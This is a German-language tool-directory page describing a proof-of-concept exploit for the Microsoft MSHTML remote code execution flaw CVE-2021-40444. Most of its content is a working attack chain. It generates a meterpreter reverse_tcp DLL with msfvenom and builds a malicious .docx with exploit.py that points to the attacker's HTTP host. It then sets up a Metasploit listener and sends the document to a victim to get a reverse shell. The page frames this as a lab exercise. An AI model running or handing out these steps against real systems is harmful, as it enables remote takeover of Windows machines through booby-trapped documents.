Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-40444-POC — Ein Versuch, die Microsoft MSHTML Remote Code Execution (RCE) Schwachstelle zu reproduzieren und das Metasploit Framework zu verwenden. | Kitploit
Tools/GitHubGitHub/kagura-maru/cve-2021-40444-poc
Exploit-FrameworksPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubkagura-maru/cve-2021-40444-poc

CVE-2021-40444-POC

Ein Versuch, die Microsoft MSHTML Remote Code Execution (RCE) Schwachstelle zu reproduzieren und das Metasploit Framework zu verwenden.

Repository anzeigen
1013vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-40444-POC

Ein Versuch, die Microsoft MSHTML Remote Code Execution (RCE) Schwachstelle mit dem Metasploit Framework nachzubilden.

funktioniert am besten, wenn nicht in FlareVM ausgeführt

VORBEREITUNG

Klonen Sie das Repository von https://github.com/lockedbyte/CVE-2021-40444

Bereiten Sie die .dll Vorlage vor, die später mit msfvenom verwendet wird

msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll

Kopieren Sie die gerade erstellte template.dll in den Ordner test/ des Repositorys Erteilen Sie der template.dll Ausführungsrechte mit chmod +x template.dll

Führen Sie das Skript aus, um die template.dll zu verarbeiten und in output zu exportieren python3 exploit.py generate ~/test/template.dll http://<SOURCE IP>

LISTENER

Das Dokument wird dann in den Ordner out/ exportiert und wir können einen Listener auf unserem HTTP-Port (Standard ist 80) einrichten python3 exploit.py host 80

Führen Sie metasploit aus mit msfconsole -q use multi/handler set payload windows/meterpreter/reverse_tcp set lhost <SOURCE IP> run

PAYLOAD

Dann können wir das document.docx an unsere verwundbare Maschine senden und die .docx ausführen

Wir erhalten eine Antwort im exploit.py-Terminal und das Labor ist erfolgreich, wenn wir eine Reverse-TCP-Shell starten können.

Tool herunterladen